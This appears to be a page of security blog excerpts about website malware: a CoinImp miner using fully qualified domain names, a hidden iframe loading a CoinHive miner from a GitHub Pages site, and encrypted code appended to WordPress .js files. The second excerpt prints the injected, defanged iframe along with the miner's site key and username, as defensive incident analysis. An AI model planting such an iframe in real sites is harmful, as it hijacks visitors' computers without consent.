Categories
Security

CoinImp Cryptominer and Fully Qualified Domain Names


We are all familiar with the conventional domain name notation, where different levels are concatenated with the full stop character (period).

E.g. “www.example.com”, where “www” is a subdomain, “example” is a second level domain, and “com” is a top level domain.

However, very few know that there is also a DNS root domain, and that it can also be specified in a fully qualified domain name.

Continue reading CoinImp Cryptominer and Fully Qualified Domain Names at Sucuri Blog.


Malicious Cryptominers from GitHub


Recently, a webmaster contacted us when their AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.

Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:

<iframe src="hxxps://wpupdates.github[.]io/ping/" style="width:0;heigh:0;border:none;">

When we opened the URL in a browser, the page was blank.

After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username MoneroU.



Massive Admedia/Adverting iFrame Infection

This past weekend we registered a spike in WordPress infections where hackers injected encrypted code at the end of all legitimate .js files. The distinguishing feature of this malware is a 32-hex-digit comment at the beginning and end of the malicious code, e.g. /*e8def60c62ec31519121bfdb43fa078f*/. This comment is unique on every infected site. Most likely an MD5…

The post Massive Admedia/Adverting iFrame Infection appeared first on Sucuri Blog.